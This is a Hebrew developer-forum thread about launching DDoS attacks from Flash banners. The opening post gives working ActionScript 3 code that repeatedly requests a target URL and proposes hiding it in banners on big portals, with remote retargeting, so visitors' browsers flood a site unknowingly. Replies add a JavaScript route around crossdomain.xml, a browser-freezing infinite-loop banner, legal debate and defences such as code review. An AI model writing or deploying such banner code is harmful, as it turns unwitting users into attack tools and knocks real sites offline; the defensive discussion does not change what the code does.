תכנות: התקפת DDoS באמצעות פלאש [מתחיל]

[elad]

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט)
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.
התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא:

Syntax: [ Download ] [ Hide ]

Syntax: [ Download ] [ Show ]

Using actionscript3 Syntax Highlighting

package
{
        import flash.display.*;
        import flash.events.*;
        import flash.net.*;

        public class DDoS extends MovieClip
        {
                public var Url:String = "http://www.website.com";
                public var UrlLoader:URLLoader = new URLLoader();
               
                public function DDoS()
                {
                        UrlLoader.addEventListener(Event.COMPLETE, Loop);

                        Loop();
                }
               
                private function Loop(e:Event=null):void
                {
                        UrlLoader.load(new URLRequest(Url));
                }
        }
}
 

Parsed in 0.031 seconds, using GeSHi 1.0.8.4

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)

קישור למאמר המקורי

[miki]

למרות שבשביל ליצור DDOS לא צריך ליות גאון גדול.. אבל אתה לא חושב שלא כדאי לפרסם פה קודים עויינים?
גם הפוסט שלך של הפריצות למשחקים הוא לא בדיוק כשר.. אבל זה עוד סביר כי אתה באת בטיעון של ידיעת האוייב.. פה אתה אפילו לא הבאת דרכים להתגונן מפני ההתקפה :O

[elad]

זאת דוגמא למה שיכול להיות בתוך באנר בפורטל בגדול,
כתבתי מה הדרך להתגונן: לבדוק את הקוד, באופן ידני או אוטומטי

בנוגע לבדיקות המשחקים, אי אפשר לדעת להגן כשלא יודעים מפני מה או כשיודעים רק את הצד התיאורטי

[פלג]

מיקי כמה דברים
1)התגוננות נגד DDOS , היא ברמת FW וכלים אפליקטייבים ושונים שמטרתם לטפל בתופעות כאלה, שזה ברמת מנהלי רשת וכדומה, ולא ברמת המתכנת בעקרון.
2)לגבי רמת הקוד - אם אתה בעל אתר גדול שמקבל באנר ממקור שאתה סומך עליו, והוא מנצל את זה בצורה זדונית, זו בעיה, וספק אם מנהלי האתר מסוגלים לעבור על כל באנר ובאנר (אתה רואה מישהו בפורטלים הגדולים עושה דבר כזה???).

לגבי המשחקים, מה לא כשר שם? בית המשפט כבר הכריעה בפסיקות בעבר, שבפריצה לאתר שלא למטרות מרמה או גרימת נזק, אלא כדי להוכיח חדירות איננה עבירה (פלילית?), תחפש פסק דין על פריצה שבוצעה לאתר המוסד והפורץ זוכה בסופו של דבר.
http://www.ynet.co.il/articles/0,7340,L-2882088,00.html

פסק הדין חסר התקדים קובע, כי בדיקת אבטחה של אתרי אינטרנט (האקינג) בישראל היא פעולה חיובית שיש לעודד אותה. "אין כל פסול שגולשים יפרסמו
ברבים אתרי אינטרנט (ובעיקר שרתי אינטרנט) שאינם מאובטחים", ציין השופט אברהם טננבוים, "אם רשימה כזו תפורסם ברבים, יהווה הדבר תמריץ וזרז לאחראים לתקן את חורי האבטחה שלהם. גולשים הבודקים את פגיעותם של אתרים פועלים במידה מסוימת לטובת הציבור ואם עושים זאת הם בכוונה טובה וללא להזיק אף ברוכים יהיו". יש להדגיש את עניין "הכוונה הטובה" – בית המשפט לא הכשיר פריצות לאתרי אינטרנט למטרת גניבת מידע או בכוונת זדון.

[בן אור]

עוד פעם crossdomain.xml בא להצלה
יהיה אפשר להעמיס את הקובץ הזה אבל לא הרבה יותר ובדרך כלל הקובץ הזה סטטי, כך צריך מתקפה מטורפת בשביל להפיל את השרת על ידי בקשות מרובות עליו, בדרך כלל מתקפות DOS מתבצעות על קובץ שרץ במשך הרבה זמן (לדוגמא חיפוש בפורום)


ובקשר לקוד שצירפת, למה המחלקה שלך מרחיבה את MovieClip?

[elad]

היא מרחיבה את MovieClip כי זאת המחלקה שמוגדרת ב-FLA

כמות הגולשים בזמן נתון של אחד הפורטלים הגדולים (בו יכול להיות באנר עם קוד דומה) יכולה לגרום להפלת אתרים גדולים

בקשות ה-http יכולות להיות מבוצעות באמצעות פלאש שיפעיל קוד JavaScript (שיבצע את בקשות ה-http שוב ושוב) ואז לא תהיה בדיקה ב- crossdomain.xml

[פלג]

עוד פעם crossdomain.xml בא להצלה

נכון שהפניה שלך תחסם על ידי כך שהדומיין שלך לא מורשה, אבל החסימה שלך נעשת כבר ברמת ה FP בדפדפן של המשתמש, ולא ע"י השרת שאותו אתה תוקף, ככה "שההגנה" שזה מהווה היא כמעט שולית, מאחר ופתחת מאות ואולי עשרות אלפי חיבורים מול שרת, ורק אחרי יצירת החיבור, ה FP יזהה שאין הרשאת גישה.

[atarsh]

בקשות ה-http יכולות להיות מבוצעות באמצעות פלאש שיפעיל קוד JavaScript (שיבצע את בקשות ה-http שוב ושוב) ואז לא תהיה בדיקה ב- crossdomain.xml

אם הפורטל נותן הרשאות js לבאנרים שרצים בו.

[פלג]

מבדיקה בעמוד הראשי של WALLA
לכולם יש
allowScriptAccess=always

[בן אור]

אז זאת לא התקפה דרך פלאש אלא דרך JS, ולכן יש אפשרות להגביל את הפלאש מלהריץ JS (זה שוואלה מאשרים JS זה עניין אחר, והם פותחים פרצה הרבה יותר חמורה מ DOS לשרת אחר הם חושפים את העוגיות של הגולשים)

[פלג]

בן אור אתה צודק, ושוב וואלה הייתה רק דוגמא.
הרעיון כאן היה להראות איך ניתן בקלות לנצל חולשות לדברים זדוניים.

[elad]

אם במקום http://www.website.com היה כתוב:
stage.loaderinfo.url
אז לפלאש היה יצר הרס-עצמי

[swatman89]

ברור שזה אסור השאלה הגדולה האם זה חוקי ומה אומר החוק מבחינת העניין הזה?

כי תכלס גם שגיאה קטנה ביותר כמו זה שהוספת כולה את הפונקציה LOOP בסוף יכולה לגרום לדבר כזה בלי אפילו שתשים לב.

[elad]

נכון, קבצי פלאש או בכלל אפליקציות בדפדפן לא חייבות לגרום לעומס במטרה זדונית, יכול להיות שמדובר בטעות
סריקה ידנית של הקוד או כלי אוטומטי שבודק קוד מקור של קבצי FLA או קוד מקומפל בפורמט SWF יפתרו את הבעיה

[פלג]

swatman89
1) לכתוב קוד זדוני זה לא חוקי? תקרא מה ציטטתי לך מפסיקת בית המשפט למעלה - הכל שאלה של מה המטרה!
2)תכנס לאתר שעושה לך באחד הפלאשים LOOP אתה תקבל התראה שיש סקריפט של פלאש שטוחן לך את המחשב , ושואל אותך האם להפסיק אותו.

[elad]

מעניין מה היה קורה אם בתוך אחד הבאנרים שבעמודים הראשיים של הפורטלים הגדולים היה כתוב:

Syntax: [ Download ] [ Hide ]

Syntax: [ Download ] [ Show ]

Using actionscript3 Syntax Highlighting

while (true) {}

Parsed in 0.028 seconds, using GeSHi 1.0.8.4

וגם ה-script time limit היה מוגדר למספר השניות המקסימלי (65535 שניות)

[בן אור]

אז אפל היו דואגים לפרסם את זה בתור בעיה בפלטפורת פלאש

[Yaniv Uriel]

בכל מקרה אי אפשר לצרוך יותר זכרון ממה ש"ארגז החול" של פלש מאשר.
ואם אתה גולש ב FF אז זה מקריס רק את הפלג של פלש ולא את כל הדפדפן.

[פלג]

בכל מקרה אי אפשר לצרוך יותר זכרון ממה ש"ארגז החול" של פלש מאשר.
ואם אתה גולש ב FF אז זה מקריס רק את הפלג של פלש ולא את כל הדפדפן.

מילא זכרון אבל מה עם זה שלפעמים הדפדפנים עפים? או שזה מעצבן את המשתמש שהכל נתקע לו והוא לא מבין למה?

[Yaniv Uriel]

ב 10.1 של flash player יש תכונה חדשה שמונעת קריסה כתוצאה מגלישה של זיכרון:

http://labs.adobe.com/technologies/flashplayer10/features.html

[elad]

Out-of-memory management
Flash Player 10.1 prevents out-of-memory browser crashes by shutting down instances where a SWF attempts to allocate more memory than is available on the device. When a SWF tries to allocate more memory than is available on a device, Flash Player 10.1 adds logic to shut down Flash Player to prevent the browser from crashing. Users will receive notification to restart the SWF, or will see a notice to refresh the page if all instances must be shutdown.

בלולאה אין-סופית:
Users will receive notification to restart the SWF, or will see a notice to refresh the page if all instances must be shutdown

האפשרות הזאת נועדה למערכות הפעלה בהן כמות הזיכרון המוקצית לתהליך נגן הפלאש היא קטנה ומוגבלת (כמו בהתקנים ניידים)